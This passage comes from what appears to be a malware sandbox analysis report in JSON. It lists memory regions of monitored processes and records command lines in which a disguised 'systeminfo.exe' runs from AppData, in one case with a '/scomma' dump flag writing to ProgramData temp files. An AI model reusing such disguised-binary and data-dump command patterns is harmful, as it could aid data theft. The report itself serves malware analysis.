"private_0x0000000002a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 44236800, "timestamp": "00:00:51.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51183616, "type": "region", "version": 1 }, "end_va": 52232191, "entry_point": 0, "filename": null, "id": "region_1575", "name": "private_0x00000000030d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51183616, "timestamp": "00:00:51.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1948450816, "type": "region", "version": 1 }, "end_va": 1948483583, "entry_point": 1948450816, "filename": "\\Windows\\SysWOW64\\npmproxy.dll", "id": "region_1576", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\syswow64\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1948450816, "timestamp": "00:00:51.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_1577", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:00:51.320", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1948319744, "type": "region", "version": 1 }, "end_va": 1948393471, "entry_point": 1948319744, "filename": "\\Windows\\SysWOW64\\dhcpcsvc.dll", "id": "region_1713", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\syswow64\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1948319744, "timestamp": "00:00:51.516", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" \"C:\\ProgramData\\FB6F.tmp\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_9", "image_name": "systeminfo.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1749", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1750", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1751", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1752", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:08.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1753", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:08.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1754", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:08.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_1755", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:08.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 0, "filename": null, "id": "region_1756", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:08.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 12451840, "type": "region", "version": 1 }, "end_va": 12578815, "entry_point": 12458144, "filename": "\\Users\\Public\\3292.exe", "id": "region_1757", "name": "3292.exe", "norm_filename": "c:\\users\\public\\3292.exe", "region_type": "memory_mapped_file", "start_va": 12451840, "timestamp": "00:01:08.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1758", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1999044608, "type": "region", "version": 1 }, "end_va": 2000617471, "entry_point": 1999044608, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1759", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999044608, "timestamp": "00:01:08.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1760", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1761", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1762", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1763", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1764", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1765", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1766", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:08.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_1767", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:01:08.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953374456, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1768", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:01:08.460", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953691544, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1769", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:08.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1954012792, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1770", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:01:08.461", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1771", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1772", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:01:08.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 8912895, "entry_point": 0, "filename": null, "id": "region_1773", "name": "private_0x0000000000780000", "norm_filename": null, "region_type": "private_memory", "start_va": 7864320, "timestamp": "00:01:08.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965388920, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1774", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:01:08.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973433043, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1775", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:01:08.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1776", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:01:08.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1777", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:01:08.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1778", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1779", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970227685, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1780", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:01:08.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965728882, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1781", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:01:08.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961445749, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1782", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:01:08.491", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993934185, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1783", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:01:08.492", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960747955, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1784", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:01:08.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960579297, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1804", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:08.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1572864, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 10485759, "entry_point": 0, "filename": null, "id": "region_1805", "name": "private_0x0000000000880000", "norm_filename": null, "region_type": "private_memory", "start_va": 8912896, "timestamp": "00:01:08.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967766077, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1806", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:01:08.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964270403, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1807", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:01:08.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970976493, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1808", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:08.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970812576, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1809", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:08.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1969110999, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1810", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:08.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 202127, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1811", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:01:08.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 12091391, "entry_point": 0, "filename": null, "id": "region_1812", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:01:08.512", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961104783, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1814", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:08.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974474379, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1815", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:01:08.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1906", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:08.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1907", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:08.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 14159871, "entry_point": 0, "filename": null, "id": "region_1908", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": "00:01:08.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 14221312, "type": "region", "version": 1 }, "end_va": 35192831, "entry_point": 0, "filename": null, "id": "region_1909", "name": "pagefile_0x0000000000d90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14221312, "timestamp": "00:01:08.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1976374785, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1910", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:01:08.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963891622, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1911", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:01:08.787", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" /scomma \"C:\\ProgramData\\FB70.tmp\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_10", "image_name": "systeminfo.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1786", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:08.498", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1787", "name": "private_0x0000000000030000", 